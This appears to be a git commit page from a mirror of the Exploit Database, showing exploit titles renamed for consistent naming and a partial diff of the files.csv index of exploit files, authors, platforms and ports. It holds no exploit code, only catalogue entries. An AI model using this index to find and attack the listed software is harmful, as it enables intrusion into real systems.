bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-09-27

Browse source 
11 new exploits

Berlios gpsd 2.7.x - Remote Format String
Berlios GPSD 2.7.x - Remote Format String

bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit
Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit

Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)

D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)

boastMachine 3.1 - (mail.php id) SQL Injection
BoastMachine 3.1 - 'mail.php' id SQL Injection

BIGACE 2.4 - Multiple Remote File Inclusion
BigACE 2.4 - Multiple Remote File Inclusion

attachmax dolphin 2.1.0 - Multiple Vulnerabilities
Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities

AtomixMP3 <= 2.3 - (Playlist) Universal Overwrite (SEH)
AtomixMP3 <= 2.3 - 'Playlist' Universal Overwrite (SEH)

BIGACE CMS 2.5 - 'Username' SQL Injection
BigACE CMS 2.5 - 'Username' SQL Injection

BIGACE CMS 2.6 - (cmd) Local File Inclusion
BigACE CMS 2.6 - (cmd) Local File Inclusion

Avast AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation
Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation

DistCC Daemon - Command Execution (Metasploit)
DistCC Daemon - Command Execution (Metasploit) (1)

Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)
Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1)

Avast 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption
Avast! 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption

bitrix site manager 4.0.5 - Remote File Inclusion
Bitrix Site Manager 4.0.5 - Remote File Inclusion

boastMachine 3.1 - Arbitrary File Upload
BoastMachine 3.1 - Arbitrary File Upload

blog system 1.5 - Multiple Vulnerabilities
Blog System 1.5 - Multiple Vulnerabilities

b2b gold script - 'id' SQL Injection
B2B Gold Script - 'id' SQL Injection

TinyBrowser - Arbitrary File Upload
Wordpress Plugin TinyBrowser - Arbitrary File Upload

Nginx http server 0.6.36 - Directory Traversal
Nginx 0.6.36 - Directory Traversal

atomic photo album 1.0.2 - Multiple Vulnerabilities
Atomic Photo Album 1.0.2 - Multiple Vulnerabilities

Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)
Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)

Bigace_2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)
BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)

bitweaver 2.8.1 - Persistent Cross-Site Scripting
Bitweaver 2.8.1 - Persistent Cross-Site Scripting

bitweaver 2.8.0 - Multiple Vulnerabilities
Bitweaver 2.8.0 - Multiple Vulnerabilities

Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)
Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2)

D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)

Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)
Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)

Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)

DistCC Daemon - Command Execution (Metasploit)
DistCC Daemon - Command Execution (Metasploit) (2)

Bigace 2.7.5 - Arbitrary File Upload
BigACE 2.7.5 - Arbitrary File Upload

atutor 2.0.2 - Multiple Vulnerabilities
ATutor 2.0.2 - Multiple Vulnerabilities

boastMachine 3.1 - Cross-Site Request Forgery (Add Admin)
BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)

Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)

atmail email server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution
AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution

Macro Expert 4.0 - Multiple Privilege Escalations

axigen mail server 8.0.1 - Persistent Cross-Site Scripting
Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting

Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation

MSI - NTIOLib.sys / WinIO.sys Local Privilege Escalation

Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation

Joomla! Component Event Booking 2.10.1 - SQL Injection

NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation

bitweaver 2.8.1 - Multiple Vulnerabilities
Bitweaver 2.8.1 - Multiple Vulnerabilities
Contrexx CMS egov Module 1.0.0 - SQL Injection
Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)

White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

atutor 1.2 - Multiple Vulnerabilities
ATutor 1.2 - Multiple Vulnerabilities

Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection
Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection

Clockstone and other CMSMasters Theme - Arbitrary File Upload
Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload

Nginx HTTP Server 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)
Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)

BuilderEngine 3.5.0 - Arbitrary File Upload

PHP Charts 1.0 - (index.php type Parameter) Remote Code Execution
PHP-Charts 1.0 - (index.php type Parameter) Remote Code Execution

Bigace CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)
BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)

BoastMachine 3.1 - admin.php Cross-Site Scripting
BoastMachine 3.1 - 'admin.php' Cross-Site Scripting

Western Digital Arkeia - Remote Code Execution (Metasploit)
Western Digital Arkeia - Remote Code Execution (Metasploit) (1)

Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting
Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting

Redoable 1.2 Theme - header.php s Parameter Cross-Site Scripting
Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting

Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery
Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery

boastMachine 2.8 - 'index.php' Local File Inclusion
BoastMachine 2.8 - 'index.php' Local File Inclusion

TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting

boastMachine 3.1 - 'key' Parameter Cross-Site Scripting
BoastMachine 3.1 - 'key' Parameter Cross-Site Scripting

Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities

WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities

Creative Contact Form 0.9.7 - Arbitrary File Upload
Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting
Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting

Paid Memberships Pro 1.7.14.2 - Directory Traversal
Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal

DukaPress 2.5.2 - Directory Traversal
Wordpress Plugin DukaPress 2.5.2 - Directory Traversal

Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection
Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection

WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting
Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting

Duplicator 0.5.8 - Privilege Escalation
Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation

VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload
Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload

Shareaholic 7.6.0.3 - Cross-Site Scripting
Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting

Paypal Currency Converter Basic For WooCommerce - File Read
Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read

Wordpess Simple Photo Gallery 1.7.8 - Blind SQL Injection
Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection

Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities
Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting
PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting
Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting
Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting

Western Digital Arkeia - Remote Code Execution (Metasploit)
Western Digital Arkeia - Remote Code Execution (Metasploit) (2)

Multiple WordPress Themes WPScientist - Arbitrary File Upload
Multiple WordPress WPScientist Themes - Arbitrary File Upload

EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities

Avast AntiVirus - X.509 Error Rendering Command Execution
Avast! AntiVirus - X.509 Error Rendering Command Execution

Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting
Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting

miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities
Avast - OOB Write Decrypting PEncrypt Packed executables
Avast - JetDb::IsExploited4x Performs Unbounded Search on Input
Avast - Heap Overflow Unpacking MoleBox Archives
Avast - Integer Overflow Verifying numFonts in TTC Header
Avast! - OOB Write Decrypting PEncrypt Packed executables
Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input
Avast! - Heap Overflow Unpacking MoleBox Archives
Avast! - Integer Overflow Verifying numFonts in TTC Header

BIGACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal
BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal

Simple Ads Manager 2.9.4.116 - SQL Injection
Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection

MySQL / MariaDB / PerconaDB 5.5.52 / 5.6.33 / 5.7.15 - Code Execution / Privilege Escalation
MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation

Avast - Authenticode Parsing Memory Corruption
Avast! - Authenticode Parsing Memory Corruption

Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting
Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting

Job Script by Scubez - Remote Code Execution
Wordpress Plugin Job Script by Scubez - Remote Code Execution

Premium SEO Pack 1.9.1.3 - wp_options Overwrite
Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite

Ocomon 2.0 - SQL Injection
This commit is contained in:
Offensive Security 2016-09-27 05:01:25 +00:00
parent a387f0befc
commit 35000196e1
16 changed files with 1413 additions and 135 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

193
files.csv
View file

@ -599,7 +599,7 @@ id,file,description,date,author,platform,type,port
772,platforms/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,cgi,webapps,0
773,platforms/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,cgi,webapps,0
774,platforms/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0
775,platforms/linux/remote/775.c,"Berlios gpsd 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947
775,platforms/linux/remote/775.c,"Berlios GPSD 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947
776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0
778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation (2)",2005-01-27,"Tim Hsu",linux,local,0
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
@ -1629,7 +1629,7 @@ id,file,description,date,author,platform,type,port
1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0
1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - (templatefolder) Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0
1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow",2006-06-15,c0rrupt,windows,local,0
1918,platforms/php/webapps/1918.php,"bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0
1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0
1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0
@ -2136,7 +2136,7 @@ id,file,description,date,author,platform,type,port
2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion",2006-09-26,Kacper,php,webapps,0
2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0
2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0
2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)",2006-09-27,"H D Moore",windows,remote,0
2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",windows,remote,0
2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0
2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion",2006-09-27,v1per-haCker,php,webapps,0
2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Inclusion",2006-09-27,"Mehmet Ince",php,webapps,0
@ -2462,7 +2462,7 @@ id,file,description,date,author,platform,type,port
2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - (Local File Inclusion / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0
2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion",2006-11-13,Kacper,php,webapps,0
2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (1) (Metasploit)",2006-11-13,"H D Moore",windows,remote,0
2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0
2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0
2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0
2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0
2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0
@ -4598,7 +4598,7 @@ id,file,description,date,author,platform,type,port
4949,platforms/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow",2008-01-21,prdelka,windows,remote,25
4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection",2008-01-21,bazik,php,webapps,0
4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - (blog.php month) SQL Injection",2008-01-21,The_HuliGun,php,webapps,0
4952,platforms/php/webapps/4952.txt,"boastMachine 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0
4952,platforms/php/webapps/4952.txt,"BoastMachine 3.1 - 'mail.php' id SQL Injection",2008-01-21,"Virangar Security",php,webapps,0
4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - 'id' File Disclosure",2008-01-21,shinmai,php,webapps,0
4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php Filename) File Disclosure",2008-01-21,MhZ91,php,webapps,0
4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion",2008-01-21,QTRinux,php,webapps,0
@ -5226,7 +5226,7 @@ id,file,description,date,author,platform,type,port
5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - (category_list.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0
5596,platforms/php/webapps/5596.txt,"BIGACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0
5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0
5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0
5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
@ -6048,7 +6048,7 @@ id,file,description,date,author,platform,type,port
6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php c' SQL Injection",2008-09-15,JosS,php,webapps,0
6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injections",2008-09-15,SirGod,php,webapps,0
6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - (produid) SQL Injection",2008-09-16,SirGod,php,webapps,0
6468,platforms/php/webapps/6468.txt,"attachmax dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0
6468,platforms/php/webapps/6468.txt,"Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0
6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0
6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0
6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,multiple,dos,0
@ -7826,7 +7826,7 @@ id,file,description,date,author,platform,type,port
8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - (members.php memid) SQL Injection",2009-03-30,SirGod,php,webapps,0
8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - (HEAD) Remote Denial of Service",2009-03-30,"Jonathan Salwan",windows,dos,0
8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - 'Filename' Local Stack Overflow",2009-03-30,"Encrypt3d.M!nd ",windows,local,0
8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (Playlist) Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0
8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - 'Playlist' Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0
8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 - PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0
8314,platforms/windows/dos/8314.php,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)",2009-03-30,"Alfons Luja",windows,dos,0
8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0
@ -8172,7 +8172,7 @@ id,file,description,date,author,platform,type,port
8661,platforms/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,windows,local,0
8662,platforms/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",windows,local,0
8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,windows,local,0
8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
8664,platforms/php/webapps/8664.pl,"BigACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0
@ -8539,7 +8539,7 @@ id,file,description,date,author,platform,type,port
9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0
9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0
9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
9052,platforms/php/webapps/9052.txt,"BigACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0
9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0
@ -9225,7 +9225,7 @@ id,file,description,date,author,platform,type,port
9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",php,webapps,0
9829,platforms/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80
9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0
9831,platforms/windows/local/9831.txt,"Avast AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0
9831,platforms/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0
9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
9833,platforms/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0
9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
@ -9299,7 +9299,7 @@ id,file,description,date,author,platform,type,port
9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2 < 6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25
9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783
9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632
9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit) (1)",2002-02-01,"H D Moore",multiple,remote,3632
9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0
9917,platforms/solaris/remote/9917.rb,"Solaris in.TelnetD TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23
9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23
@ -9317,7 +9317,7 @@ id,file,description,date,author,platform,type,port
9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548
9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0
9933,platforms/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1)",2009-07-10,kf,multiple,remote,0
9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139
9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0
@ -9477,7 +9477,7 @@ id,file,description,date,author,platform,type,port
10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - (jar50.dll) Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0
10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command Denial of Service",2009-11-13,zhangmc,windows,dos,21
10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0
